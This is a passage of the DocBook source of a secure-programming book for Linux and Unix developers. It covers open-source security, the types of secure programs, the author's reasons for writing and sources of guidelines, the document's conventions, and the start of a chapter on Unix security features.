(as Bruce Perens says, ``who wants to be someone else's unpaid employee?'').
|
||
In particular,
|
||
since the reviewers with the most incentive tend to be people trying to modify
|
||
the program, this disincentive to participate reduces the number of
|
||
``eyeballs''.
|
||
Elias Levy made this mistake in his article about open source
|
||
security; his examples of software that had been broken into
|
||
(e.g., TIS's Gauntlet) were not, at the time, open source.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Second, at least some of the people developing and
|
||
reviewing the code must know how to write secure programs.
|
||
Hopefully the existence of this book will help.
|
||
Clearly, it doesn't matter if there are ``many eyeballs'' if none of the
|
||
eyeballs know what to look for.
|
||
Note that it's not necessary for everyone to know how to write
|
||
secure programs, as long as those who do know how are examining the
|
||
code changes.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Third, once found, these problems need to be fixed quickly
|
||
and their fixes distributed.
|
||
Open source systems tend to fix the problems quickly, but the distribution
|
||
is not always smooth.
|
||
For example, the OpenBSD developers do an excellent job of reviewing code for
|
||
security flaws - but they don't always report the identified
|
||
problems back to the original developer.
|
||
Thus, it's quite possible for there to be a fixed version in one system,
|
||
but for the flaw to remain in another.
|
||
I believe this problem is lessening over time, since no one
|
||
``downstream'' likes to repeatedly fix the same problem.
|
||
Of course, ensuring that security patches are actually installed on
|
||
end-user systems is a problem for both open source and closed source software.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
Another advantage of open source is that, if you find a problem, you can
|
||
fix it immediately.
|
||
This really doesn't have any counterpart in closed source.
|
||
</para>
|
||
|
||
<!--
|
||
Could quote some numbers. More NT than Linux vulnerabilities found in 2000;
|
||
more NT web sites defaced, too. But it's hard to really quantify.
|
||
-->
|
||
|
||
<para>
|
||
In short, the effect on security of open source software
|
||
is still a major debate in the security community, though a large number
|
||
of prominent experts believe that it has great potential to be
|
||
more secure.
|
||
</para>
|
||
|
||
</sect2>
|
||
</sect1>
|
||
|
||
<sect1 id="types-of-programs">
|
||
<title>Types of Secure Programs</title>
|
||
|
||
<para>
|
||
Many different types of programs may need to be secure programs
|
||
(as the term is defined in this book).
|
||
Some common types are:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
<para>
|
||
Application programs used as viewers of remote data.
|
||
Programs used as viewers (such as word processors or file format viewers)
|
||
are often asked to view data sent remotely by an untrusted user
|
||
(this request may be automatically invoked by a web browser).
|
||
Clearly, the untrusted
|
||
user's input should not be allowed to cause the application
|
||
to run arbitrary programs.
|
||
It's usually unwise to support initialization macros (run when the data
|
||
is displayed); if you must, then you must create a secure sandbox
|
||
(a complex and error-prone task that almost never succeeds, which is why
|
||
you shouldn't support macros in the first place).
|
||
Be careful of issues such as buffer overflow, discussed in
|
||
<xref linkend="buffer-overflow">, which might
|
||
allow an untrusted user to force the viewer to run an arbitrary program.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Application programs used by the administrator (root).
|
||
Such programs shouldn't trust information that can be controlled
|
||
by non-administrators.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Local servers (also called daemons).
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Network-accessible servers (sometimes called network daemons).
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Web-based applications (including CGI scripts).
|
||
These are a special case of network-accessible servers, but they're
|
||
so common they deserve their own category.
|
||
Such programs are invoked indirectly via a web server, which filters out
|
||
some attacks but nevertheless leaves many attacks that must be withstood.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Applets (i.e., programs downloaded to the client for automatic execution).
|
||
This is something Java is especially famous for, though other languages
|
||
(such as Python) support mobile code as well.
|
||
There are several security viewpoints here; the implementer of the
|
||
applet infrastructure on the client side has to make sure that the
|
||
only operations allowed are ``safe'' ones, and the writer of an applet has
|
||
to deal with the problem of hostile hosts (in other words, you can't
|
||
normally trust the client).
|
||
There is some research attempting to deal with running applets on
|
||
hostile hosts, but frankly
|
||
I'm skeptical of the value of these approaches
|
||
and this subject is exotic enough that I don't cover it further here.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
setuid/setgid programs.
|
||
These programs are invoked by a local user and, when executed, are
|
||
immediately granted the privileges of the program's owner and/or
|
||
owner's group.
|
||
In many ways these are the hardest programs to secure, because so many
|
||
of their inputs are under the control of the untrusted user and some
|
||
of those inputs are not obvious.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
This book merges the issues of these different types of program into
|
||
a single set.
|
||
The disadvantage of this approach is that some of the issues identified
|
||
here don't apply to all types of programs.
|
||
In particular, setuid/setgid programs have many surprising inputs and several
|
||
of the guidelines here only apply to them.
|
||
However, things are not so clear-cut, because
|
||
a particular program may cut across these boundaries (e.g., a CGI script
|
||
may be setuid or setgid, or be configured in a way that has the same effect),
|
||
and some programs are divided into several executables each of which
|
||
can be considered a different ``type'' of program.
|
||
The advantage of considering all of these program types together is that we can
|
||
consider all issues without trying to apply an inappropriate category
|
||
to a program.
|
||
As will be seen, many of the principles apply to all programs that
|
||
need to be secured.
|
||
</para>
|
||
|
||
<para>
|
||
There is a slight bias in this book toward programs written in
|
||
C, with some notes on other languages such as C++, Perl, PHP, Python,
|
||
Ada95, and Java.
|
||
This is because C is the most common language for
|
||
implementing secure programs on Unix-like systems
|
||
(other than CGI scripts, which tend to use languages such as
|
||
Perl, PHP, or Python).
|
||
Also, most other languages' implementations call the C library.
|
||
This is not to imply that C is somehow the ``best'' language for this purpose,
|
||
and most of the principles described here apply regardless of the
|
||
programming language used.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="paranoia">
|
||
<title>Paranoia is a Virtue</title>
|
||
|
||
<para>
|
||
The primary difficulty in writing secure programs is that
|
||
writing them requires a different mind-set, in short, a paranoid mind-set.
|
||
The reason is that the impact of errors (also called defects or bugs)
|
||
can be profoundly different.
|
||
</para>
|
||
|
||
<para>
|
||
Normal non-secure programs have many errors.
|
||
While these errors are undesirable, these errors usually
|
||
involve rare or unlikely situations, and if a user should stumble upon
|
||
one they will try to avoid using the tool that way in the future.
|
||
</para>
|
||
|
||
<para>
|
||
In secure programs, the situation is reversed.
|
||
Certain users will intentionally search out and cause rare or unlikely
|
||
situations, in the hope that such attacks will give them unwarranted privileges.
|
||
As a result, when writing secure programs, paranoia is a virtue.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="why-write">
|
||
<title>Why Did I Write This Document?</title>
|
||
<!-- ???: Okay, this doesn't really belong here, but I can't figure out
|
||
where else to put it. I don't want the introduction to get longer. -->
|
||
<!-- ???: http://www.wired.com/news/politics/0,1283,34865,00.html
|
||
"Developers Blasted on Security", Reuters, 8:45 a.m. Mar. 9, 2000 PST
|
||
Rich Pethia stated to the U.S. Congress that
|
||
"There is little evidence of improvement in the security features of most
|
||
products,"
|
||
"Developers are not devoting sufficient effort to apply lessons
|
||
learned about the sources of vulnerabilities."
|
||
Richard D. Pethia is manager of the SEI Survivable Systems
|
||
Initiative and first manager of the CERT<52> Coordination Center (CERT<52>/CC).
|
||
(see Spotlight . Volume 1 . Issue 3 . December 1998,
|
||
"Interview with Richard D. Pethia" by Bill Pollak at
|
||
http://interactive.sei.cmu.edu/Features/1998/December/Spotlight/spotlight_dec98.htm
|
||
This interview states "The problem that I see is at the implementation
|
||
level - the code that's going out today is just as buggy as the code
|
||
that went out 10 years ago."
|
||
|
||
|
||
??? : Somehow add:
|
||
"A secure and Open society"
|
||
August 27, 1999
|
||
by Michael MacMillan
|
||
http://www.itworldcanada.com/cw/archive/cw15-17/cw_wtemplate.cfm?filename=c1517n8.htm
|
||
ITworldcanada.com
|
||
(interview with Theo de Raadt,
|
||
head of the OpenBSD project, which is focused on security.
|
||
The problem with professional programmers is not a lack of ability,
|
||
but lack of attention to detail, he said.
|
||
...
|
||
The secret is straightforward - de Raadt and his peers assume that
|
||
every single bug found in the code occurs elsewhere.
|
||
de Raadt admits it sounds simple, but just rooting security bugs
|
||
out of the entire source tree took 10 full-time developers
|
||
one and a half years to complete.
|
||
"It?s a hell of a lot of work and I think that explains why it hasn't
|
||
been done by many people," he said. www.openbsd.org.
|
||
|
||
???: add info about smartcards, e.g., how to code algorithms so the
|
||
key won't be exposed by power fluctuations.
|
||
|
||
-->
|
||
|
||
|
||
<para>
|
||
One question I've been asked is ``why did you write this book''?
|
||
Here's my answer:
|
||
Over the last several years I've noticed that many developers for
|
||
Linux and Unix
|
||
seem to keep falling into the same security pitfalls, again and again.
|
||
Auditors were slowly catching problems, but it would have been better
|
||
if the problems weren't put into the code in the first place.
|
||
I believe that part of the problem was that there wasn't a single, obvious
|
||
place where developers could go and get information on how to avoid
|
||
known pitfalls.
|
||
The information was publicly available, but it was often hard to find,
|
||
out-of-date, incomplete, or had other problems.
|
||
Most such information didn't particularly discuss Linux at all, even
|
||
though it was becoming widely used!
|
||
That leads up to the answer: I developed this book
|
||
in the hope that future software developers won't repeat
|
||
past mistakes, resulting in more secure systems.
|
||
You can see a larger discussion of this at
|
||
<ulink
|
||
url="http://www.linuxsecurity.com/feature_stories/feature_story-6.html">http://www.linuxsecurity.com/feature_stories/feature_story-6.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
A related question that could be asked is ``why did you write your own book
|
||
instead of just referring to other documents''?
|
||
There are several answers:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
Much of this information was scattered about; placing
|
||
the critical information in one organized document
|
||
makes it easier to use.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Some of this information is not written for the programmer, but
|
||
is written for an administrator or user.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Much of the available information emphasizes portable constructs
|
||
(constructs that work on all Unix-like systems), and
|
||
failed to discuss Linux at all.
|
||
It's often best to avoid Linux-unique abilities for portability's sake,
|
||
but sometimes the Linux-unique abilities can really aid security.
|
||
Even if non-Linux portability is desired, you may want to support
|
||
the Linux-unique abilities when running on Linux.
|
||
And, by emphasizing Linux, I can include references to information that
|
||
is helpful to someone targeting Linux that is not necessarily true for
|
||
others.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="sources-of-guidelines">
|
||
<title>Sources of Design and Implementation Guidelines</title>
|
||
|
||
<para>
|
||
Several documents help describe how to write
|
||
secure programs (or, alternatively, how to find security problems in
|
||
existing programs), and were the basis for the guidelines highlighted
|
||
in the rest of this book.
|
||
<!-- ???: Add http://securityparadigm.com's "Computer Vulnerabilities" notes -->
|
||
<!-- ???: Add http://www.linuxhelp.org/lsap.shtml alternatively
|
||
http://ferret.lmh.ox.ac.uk/~security
|
||
Security-Audit's Frequently Asked Questions
|
||
v 1.9 2000/03/21 01:01:08, Jeff Graham <lsap@demit.net> -->
|
||
<!-- I added fish (Dan Farmer's) refs at http://www.fish.com/security -->
|
||
<!-- ??? Really need to emphasize the risks of symbolic/hard links, esp.
|
||
shared directories, such as /tmp. Symbolic links to /dev/zero can
|
||
really do bad things, symbolic links to /etc/passwd is of course
|
||
an ancient attack. -->
|
||
<!-- ??? Mention "terminal" and the possibility of retransmission back -->
|
||
<!-- ???: Traverse the Bugtraq archives, CERT advisories,
|
||
MITRE's CVE at http://cve.mitre.org etc.
|
||
to make sure I've covered the important stuff and pull out good
|
||
examples/stories. -->
|
||
<!-- ???: Add info and reference to
|
||
Landwehr 1994. Landwehr, Carl E., Alan R. Bull, John P. McDermott,
|
||
and William S. Choi. September 1994.
|
||
A Taxonomy of Computer Program Security Flaws.
|
||
ACM Computing Surveys. Vol. 26, No. 3.
|
||
|
||
http://scholar.lib.vt.edu/theses/available/etd-04252001-234145/
|
||
Lough, Daniel Lowry
|
||
"A Taxonomy of Computer Attacks with Applications to Wireless Network"
|
||
Published 2001.
|
||
Summary:
|
||
This research presents a comprehensive analysis of the types of attacks that are being leveled upon computer systems and the
|
||
construction of a general taxonomy and methodologies that will facilitate design of secure protocols. To develop a comprehensive
|
||
taxonomy, existing lists, charts, and taxonomies of host and network attacks published over the last thirty years are examined and
|
||
combined, revealing common denominators among them. These common denominators, as well as new information, are assimilated to
|
||
produce a broadly applicable, simpler, and more complete taxonomy. It is shown that all computer attacks can be broken into a taxonomy
|
||
consisting of improper conditions: Validation Exposure Randomness Deallocation Improper Conditions Taxonomy; hence described by the
|
||
acronym VERDICT.
|
||
|
||
The developed methodologies are applicable to both wired and wireless systems, and they are applied to some existing Internet attacks to
|
||
show how they can be classified under VERDICT. The methodologies are applied to the IEEE 802.11 wireless local area network protocol
|
||
and numerous vulnerabilities are found. Finally, an extensive annotated bibliography is included.
|
||
|
||
http://cr.yp.to/qmail/guarantee.html Qmail
|
||
-->
|
||
|
||
</para>
|
||
|
||
<para>
|
||
For general-purpose servers and setuid/setgid programs, there are a number
|
||
of valuable documents (though some are difficult to find without
|
||
having a reference to them).
|
||
</para>
|
||
|
||
|
||
<para>
|
||
Matt Bishop [1996, 1997]
|
||
has developed several extremely valuable papers and presentations
|
||
on the topic, and in fact he has a web page dedicated to the topic at
|
||
<ulink
|
||
url="http://olympus.cs.ucdavis.edu/~bishop/secprog.html">http://olympus.cs.ucdavis.edu/~bishop/secprog.html</ulink>.
|
||
AUSCERT has released a programming checklist
|
||
<ulink
|
||
url="ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist">[AUSCERT 1996]</ulink>,
|
||
based in part on chapter 23 of Garfinkel and Spafford's book discussing how
|
||
to write secure SUID and network programs
|
||
<ulink
|
||
url="http://www.oreilly.com/catalog/puis">[Garfinkel 1996]</ulink>.
|
||
<ulink
|
||
url="http://www.sunworld.com/swol-04-1998/swol-04-security.html">Galvin [1998a]</ulink> described a simple process and checklist
|
||
for developing secure programs; he later updated the checklist in
|
||
<ulink
|
||
url="http://www.sunworld.com/sunworldonline/swol-08-1998/swol-08-security.html">Galvin [1998b]</ulink>.
|
||
<ulink
|
||
url="http://www.pobox.com/~kragen/security-holes.html">Sitaker [1999]</ulink>
|
||
presents a list of issues for the ``Linux security audit'' team to search for.
|
||
<ulink
|
||
url="http://www.homeport.org/~adam/review.html">Shostack [1999]</ulink>
|
||
defines another checklist for reviewing security-sensitive code.
|
||
The NCSA
|
||
<ulink url="http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming">[NCSA]</ulink>
|
||
provides a set of terse but useful secure programming guidelines.
|
||
Other useful information sources include the
|
||
<emphasis remap="it">Secure Unix Programming FAQ</emphasis>
|
||
<ulink
|
||
url="http://www.whitefang.com/sup/">[Al-Herbish 1999]</ulink>,
|
||
the
|
||
<emphasis remap="it">Security-Audit's Frequently Asked Questions</emphasis>
|
||
<ulink
|
||
url="http://lsap.org/faq.txt">[Graham 1999]</ulink>,
|
||
and
|
||
<ulink
|
||
url="http://www.clark.net/pub/mjr/pubs/pdf/">Ranum [1998]</ulink>.
|
||
Some recommendations must be taken with caution, for example,
|
||
the BSD setuid(7) man page
|
||
<ulink
|
||
url="http://www.homeport.org/~adam/setuid.7.html">[Unknown]</ulink>
|
||
recommends the use of access(3) without noting the dangerous race conditions
|
||
that usually accompany it.
|
||
Wood [1985] has some useful but dated advice
|
||
in its ``Security for Programmers'' chapter.
|
||
<ulink
|
||
url="http://www.research.att.com/~smb/talks">Bellovin [1994]</ulink>
|
||
includes useful guidelines and some specific examples, such as how to
|
||
restructure an ftpd implementation to be simpler and more secure.
|
||
FreeBSD provides some guidelines
|
||
<ulink
|
||
url="http://www.freebsd.org/security/security.html">FreeBSD [1999]</ulink>
|
||
<ulink url="http://developer.gnome.org/doc/guides/programming-guidelines/book1.html">[Quintero 1999]</ulink>
|
||
is primarily concerned with GNOME programming guidelines, but it
|
||
includes a section on security considerations.
|
||
<ulink url="http://www.fish.com/security/murphy.html">[Venema 1996]</ulink>
|
||
provides a detailed discussion (with examples) of some common errors
|
||
when programming secure programs (widely-known or predictable passwords,
|
||
burning yourself with malicious data, secrets in user-accessible data,
|
||
and depending on other programs).
|
||
<ulink url="http://www.fish.com/security/maldata.html">[Sibert 1996]</ulink>
|
||
describes threats arising from malicious data.
|
||
Michael Bacarella's article
|
||
<ulink url="http://m.bacarella.com/papers/secsoft/html">
|
||
The Peon's Guide To Secure System Development</ulink>
|
||
provides a nice short set of guidelines.
|
||
</para>
|
||
|
||
<para>
|
||
There are many documents giving security guidelines for
|
||
programs using
|
||
the Common Gateway Interface (CGI) to interface with the web.
|
||
These include
|
||
<!-- ???: Re-examine this one: anything new here? -->
|
||
<ulink url="http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec">Van Biesbrouck [1996]</ulink>,
|
||
<ulink
|
||
url="http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html">Gundavaram [unknown]</ulink>,
|
||
<ulink url="http://webreview.com/wr/pub/97/08/08/bookshelf">
|
||
[Garfinkle 1997]</ulink>
|
||
<ulink
|
||
url="http://www.eekim.com/pubs/cgibook">Kim [1996]</ulink>,
|
||
<ulink
|
||
url="http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt">Phillips [1995]</ulink>,
|
||
<ulink
|
||
url="http://www.w3.org/Security/Faq/www-security-faq.html">Stein [1999]</ulink>,
|
||
<ulink url="http://members.home.net/razvan.peteanu">[Peteanu 2000]</ulink>,
|
||
and
|
||
<ulink
|
||
url="http://advosys.ca/tips/web-security.html">[Advosys 2000]</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
There are many documents specific to a language, which are further
|
||
discussed in the language-specific sections of this book.
|
||
For example, the Perl distribution includes
|
||
<ulink url="http://www.perl.com/pub/doc/manual/html/pod/perlsec.html">
|
||
perlsec(1)</ulink>, which describes how to use Perl more securely.
|
||
The Secure Internet Programming site at
|
||
<ulink url="http://www.cs.princeton.edu/sip">http://www.cs.princeton.edu/sip</ulink>
|
||
is interested in computer security issues in general, but focuses on
|
||
mobile code systems such as Java, ActiveX, and JavaScript; Ed Felten
|
||
(one of its principles) co-wrote a book on securing Java
|
||
(<ulink url="http://www.securingjava.com">[McGraw 1999]</ulink>)
|
||
which is discussed in <xref linkend="java">.
|
||
Sun's security code guidelines provide some guidelines primarily
|
||
for Java and C; it is available at
|
||
<ulink url="http://java.sun.com/security/seccodeguide.html">
|
||
http://java.sun.com/security/seccodeguide.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Yoder [1998] contains a collection of patterns to be used
|
||
when dealing with application security.
|
||
It's not really a specific set of guidelines, but a set of commonly-used
|
||
patterns for programming that you may find useful.
|
||
The Schmoo group maintains a web page linking to information on
|
||
how to write secure code at
|
||
<ulink url="http://www.shmoo.com/securecode">http://www.shmoo.com/securecode</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
There are many documents describing the issue from
|
||
the other direction (i.e., ``how to crack a system'').
|
||
One example is McClure [1999], and there's countless amounts of material
|
||
from that vantage point on the Internet.
|
||
There are also more general documents on computer architectures on how
|
||
attacks must be developed to exploit them, e.g.,
|
||
[LSD 2001].
|
||
The Honeynet Project has been collecting information
|
||
(including statistics) on how attackers
|
||
actually perform their attacks; see their website at
|
||
<ulink url="http://project.honeynet.org">http://project.honeynet.org</ulink>
|
||
for more information.
|
||
</para>
|
||
|
||
<para>
|
||
There's also a large body of information on vulnerabilities
|
||
already identified in existing programs.
|
||
This can be a useful set of
|
||
examples of ``what not to do,'' though it takes effort to extract more
|
||
general guidelines from the large body of specific examples.
|
||
There are mailing lists that discuss security issues; one of the most
|
||
well-known is
|
||
<ulink url="http://SecurityFocus.com/forums/bugtraq/faq.html">
|
||
Bugtraq</ulink>, which among other things develops a list of vulnerabilities.
|
||
The CERT Coordination Center (CERT/CC)
|
||
is a major reporting center for Internet security problems which
|
||
reports on vulnerabilities.
|
||
The CERT/CC occasionally produces advisories that
|
||
provide a description of a serious security problem
|
||
and its impact, along with
|
||
instructions on how to obtain a patch or details of a workaround; for
|
||
more information see
|
||
<ulink url="http://www.cert.org">http://www.cert.org</ulink>.
|
||
Note that originally the CERT was
|
||
a small computer emergency response team, but officially
|
||
``CERT'' doesn't stand for anything now.
|
||
The Department of Energy's
|
||
<ulink url="http://ciac.llnl.gov/ciac">Computer
|
||
Incident Advisory Capability (CIAC)</ulink> also reports on vulnerabilities.
|
||
<!-- Could reference ntbugtraq and the ones listed in
|
||
http://www.cert.org/other_sources/other_teams.html and the
|
||
various backers of CVE -->
|
||
These different groups may identify the same vulnerabilities but use different
|
||
names.
|
||
To resolve this problem,
|
||
MITRE supports the Common Vulnerabilities and Exposures (CVE) list
|
||
which creates a single unique identifier (``name'')
|
||
for all publicly known vulnerabilities and security exposures
|
||
identified by others; see
|
||
<ulink url="http://www.cve.mitre.org">http://www.cve.mitre.org</ulink>.
|
||
NIST's ICAT
|
||
is a searchable catalog of computer vulnerabilities, categorizing
|
||
each CVE vulnerability so that they can be searched
|
||
and compared later; see
|
||
<ulink url="http://csrc.nist.gov/icat">http://csrc.nist.gov/icat</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
This book is a summary of what I believe are the most
|
||
useful and important guidelines.
|
||
My goal is a book that
|
||
a good programmer can just read and then be fairly well prepared
|
||
to implement a secure program.
|
||
No single document can really meet this goal, but
|
||
I believe the attempt is worthwhile.
|
||
My objective is to strike a balance somewhere between a
|
||
``complete list of all possible guidelines''
|
||
(that would be unending and unreadable)
|
||
and the various ``short'' lists available on-line that are nice and short
|
||
but omit a large number of critical issues.
|
||
When in doubt, I include the guidance; I believe in that case it's better
|
||
to make the information
|
||
available to everyone in this ``one stop shop'' document.
|
||
The organization presented here is my own (every list has its own, different
|
||
structure), and some of the guidelines (especially the Linux-unique
|
||
ones, such as those on capabilities and the FSUID value) are also my own.
|
||
Reading all of the referenced documents listed above as well
|
||
is highly recommended, though I realize that for many it's impractical.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="other-sources">
|
||
<title>Other Sources of Security Information</title>
|
||
|
||
<para>
|
||
There are a vast number of web sites and mailing lists dedicated to
|
||
security issues.
|
||
Here are some other sources of security information:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
<ulink url="http://www.securityfocus.com">Securityfocus.com</ulink>
|
||
has a wealth of general security-related news and information, and hosts
|
||
a number of security-related mailing lists.
|
||
See their website for information on how to subscribe and view their archives.
|
||
A few of the most relevant mailing lists on SecurityFocus are:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
The ``Bugtraq'' mailing list is, as noted above,
|
||
a ``full disclosure moderated mailing list for the detailed discussion and
|
||
announcement of computer security vulnerabilities:
|
||
what they are, how to exploit them, and how to fix them.''
|
||
</para></listitem>
|
||
<listitem><para>
|
||
The ``secprog'' mailing list is
|
||
a moderated mailing list for the discussion of secure software
|
||
development methodologies and techniques.
|
||
I specifically monitor this list, and I coordinate with its moderator
|
||
to ensure that resolutions reached in SECPROG (if I agree with them)
|
||
are incorporated into this document.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
The ``vuln-dev'' mailing list discusses potential or undeveloped holes.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para></listitem>
|
||
<listitem><para>
|
||
IBM's ``developerWorks: Security'' has a library of interesting articles.
|
||
You can learn more from
|
||
<ulink url="http://www.ibm.com/developer/security">http://www.ibm.com/developer/security</ulink>.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
For Linux-specific security information, a good source is
|
||
<ulink url="http://www.linuxsecurity.com">LinuxSecurity.com</ulink>.
|
||
If you're interested in auditing Linux code, places to see include
|
||
the <ulink url="http://www.linuxhelp.org/lsap.shtml">Linux
|
||
Security-Audit Project FAQ</ulink>
|
||
and <ulink url="http://www.lkap.org">Linux Kernel Auditing Project</ulink>
|
||
are dedicated to auditing Linux code for security issues.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
Of course, if you're securing specific systems, you should sign up to
|
||
their security mailing lists (e.g., Microsoft's, Red Hat's, etc.)
|
||
so you can be warned of any security updates.
|
||
</para>
|
||
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="conventions">
|
||
<title>Document Conventions</title>
|
||
|
||
<para>
|
||
System manual pages are referenced in the format <emphasis remap="it">name(number)</emphasis>,
|
||
where <emphasis remap="it">number</emphasis> is the section number of the manual.
|
||
The pointer value that means ``does not point anywhere'' is called NULL;
|
||
C compilers will convert the integer 0 to the value NULL in most circumstances
|
||
where a pointer is needed,
|
||
but note that nothing in the C standard requires that NULL actually
|
||
be implemented by a series of all-zero bits.
|
||
C and C++ treat the character '\0' (ASCII 0) specially, and this value
|
||
is referred to as NIL in this book (this is usually called ``NUL'',
|
||
but ``NUL'' and ``NULL'' sound identical).
|
||
Function and method names always use the correct case, even if that means
|
||
that some sentences must begin with a lower case letter.
|
||
I use the term ``Unix-like'' to mean Unix, Linux, or other systems whose
|
||
underlying models are very similar to Unix;
|
||
I can't say POSIX, because there are systems such as Windows 2000 that
|
||
implement portions of POSIX yet have vastly different security models.
|
||
</para>
|
||
|
||
<para>
|
||
An attacker is called an ``attacker'', ``cracker'', or ``adversary'',
|
||
and not a ``hacker''.
|
||
Some journalists mistakenly use the word ``hacker'' instead of ``attacker'';
|
||
this book avoids this misuse, because many
|
||
Linux and Unix developers refer to themselves as ``hackers''
|
||
in the traditional non-evil sense of the term.
|
||
To many Linux and Unix developers, the term ``hacker'' continues
|
||
to mean simply an expert or enthusiast, particularly regarding computers.
|
||
It is true that some hackers commit malicious or intrusive actions,
|
||
but many other hackers do not,
|
||
and it's unfair to claim that all hackers perform malicious activities.
|
||
Many other glossaries and books note that not all hackers are attackers.
|
||
For example,
|
||
the Industry Advisory Council's Information Assurance (IA)
|
||
Special Interest Group (SIG)'s
|
||
<ulink url="http://www.iaconline.org/sig_infoassure.html">
|
||
Information Assurance Glossary</ulink> defines hacker as
|
||
``A person who delights in having an intimate understanding of the
|
||
internal workings of computers and computer networks.
|
||
The term is misused in a negative context where `cracker' should be used.''
|
||
<ulink url="http://www.catb.org/~esr/jargon">The
|
||
Jargon File</ulink> has a
|
||
<ulink url="http://www.catb.org/~esr/jargon/html/entry/hacker.html">
|
||
long and complicate definition for hacker</ulink>, starting with
|
||
``A person who enjoys exploring the details of programmable systems
|
||
and how to stretch their capabilities,
|
||
as opposed to most users, who prefer to learn only the minimum necessary.'';
|
||
it notes although some people use the term to mean
|
||
``A malicious meddler who tries to discover sensitive information
|
||
by poking around'', it also states that this definition is deprecated and
|
||
that the correct term for this sense is ``cracker''.
|
||
</para>
|
||
|
||
<!-- TRANSLATORS: FEEL FREE TO OMIT THE FOLLOWING PARAGRAPH
|
||
(OR PORTIONS OF IT) IF IT DOES NOT APPLY TO YOUR LANGUAGE. -->
|
||
<para>
|
||
This book uses the ``new'' or ``logical'' quoting system, instead
|
||
of the traditional American quoting system: quoted information
|
||
does not include any trailing punctuation if the punctuation
|
||
is not part of the material being quoted.
|
||
While this may cause a minor loss of typographical beauty, the traditional
|
||
American system causes extraneous characters to be placed inside the quotes.
|
||
These extraneous characters have
|
||
no effect on prose but can be disastrous in code or computer commands.
|
||
<!-- See http://www.catb.org/~esr/jargon/html/Hacker-Writing-Style.html -->
|
||
<!-- I distinguish between the terms privilege and permission in this book;
|
||
a process (subject) may acquire privileges, while an object has permissions. -->
|
||
I use standard American (not British) spelling; I've yet to meet an
|
||
English speaker on any continent who has trouble with this.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
</chapter>
|
||
|
||
<chapter id="features">
|
||
<title>Summary of Linux and Unix Security Features</title>
|
||
|
||
<epigraph>
|
||
<attribution>Proverbs 2:11 (NIV)</attribution>
|
||
<para>
|
||
Discretion will protect you, and understanding will guard you.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
Before discussing guidelines on how to use Linux or Unix security features,
|
||
it's useful to know what those features are from a programmer's viewpoint.
|
||
This section briefly describes those features that are widely available
|
||
on nearly all Unix-like systems.
|
||
However, note that there is considerable variation between
|
||
different versions of Unix-like systems, and
|
||
not all systems have the abilities described here.
|
||
This chapter also notes some extensions or features specific to Linux;
|
||
Linux distributions tend to be fairly similar to each other from the
|
||
point-of-view of programming for security, because they all use essentially
|
||
the same kernel and C library (and the GPL-based licenses encourage rapid
|
||
dissemination of any innovations).
|
||
It also notes some of the security-relevant differences between different
|
||
Unix implementations, but please note that this isn't an exhaustive list.
|
||
This chapter doesn't discuss issues such as implementations of
|
||
mandatory access control (MAC) which many Unix-like systems do not implement.
|
||
If you already know what
|
||
those features are, please feel free to skip this section.
|
||
</para>
|
||
|
||
<para>
|
||
Many programming guides skim briefly over the security-relevant portions
|
||
of Linux or Unix and skip important information.
|
||
In particular, they often discuss ``how to use'' something in general terms
|
||
but gloss over the security attributes that affect their use.
|
||
Conversely, there's a great deal of detailed information in
|
||
the manual pages about individual functions, but the manual pages
|
||
sometimes obscure key security issues with detailed discussions on how
|
||
to use each individual function.
|
||
This section tries to bridge that gap; it gives an overview of
|
||
the security mechanisms in Linux that are likely to be used
|
||
by a programmer, but concentrating specifically on the security
|
||
ramifications.
|
||
This section has more depth than the typical programming guides, focusing
|
||
specifically on security-related matters, and points to references
|
||
where you can get more details.
|
||
</para>
|
||
|
||
<para>
|
||
First, the basics.
|
||
Linux and Unix are
|
||
fundamentally divided into two parts: the kernel and ``user space''.
|
||
Most programs execute in user space (on top of the kernel).
|
||
Linux supports the concept of ``kernel modules'', which is simply the
|
||
ability to dynamically load code into the kernel, but note that it
|
||
still has this fundamental division.
|
||
Some other systems (such as the HURD) are ``microkernel'' based systems; they
|
||
have a small kernel with more limited functionality, and a set of ``user''
|
||
